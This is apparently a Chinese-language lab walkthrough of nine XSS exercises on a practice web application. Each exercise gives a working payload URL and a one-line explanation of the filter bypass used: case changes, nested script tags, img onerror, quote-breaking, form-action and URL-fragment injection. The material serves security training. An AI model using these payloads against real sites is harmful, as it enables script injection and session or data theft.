日期:2020-09-12
XSS
- example1
DOM 型XSS 直接注入
/xss/example1.php?name=<script>alert("xxx")</script>
- example2
DOM 型XSS 直接注入 没反应说明有过滤 首字母大写试试注入成功
/xss/example2.php?name=<Script>alert("xxx")</Script>
- example3
DOM 型XSS 直接注入 没反应说明有过滤 首字母大写发现没效果 过滤掉了script标签 所以绕过一下使得过滤一次之后一样可以注入
/xss/example3.php?name=<scr<script>ipt>alert(111)</SC</script>RIPT>
- example4
输入之前的poc发现直接返回error 应该是判断了script标签 所以只有跟换其他标签触发,例如img标签的onerror函数
/xss/example3.php?name=<img%20src=""%20%20onerror=alert("111")>
- example5
输入alert直接报错,可以使用其他的弹出框window.confirm("sometext");window.prompt("sometext","defaultText");
/xss/example5.php?name=<script>window.confirm("xss")</script>
- example6
通过f12 发现变量被复制给了a,所以可以直接闭合截断
/xss/example6.php?name=";alert(111);"
- example7
通过f12 发现变量被复制给了a,所以可以直接闭合截断 与上面一题有区别的是这次是单引号闭合
/xss/example7.php?name=hacker%27;%20alert(111);%27
- example8
通过看F12 可以看到action中的连接就是url,所以可以尝试form表单截断
/xss/example8.php/"><script>alert("xss")</script>
- example9
默认url 是显示#hacker 所以是#后面的内容是注入点 但是这个只有在ie上才有效,当然也有可能有别的解题思路
/xss/example9.php#<script>alert(1)</script>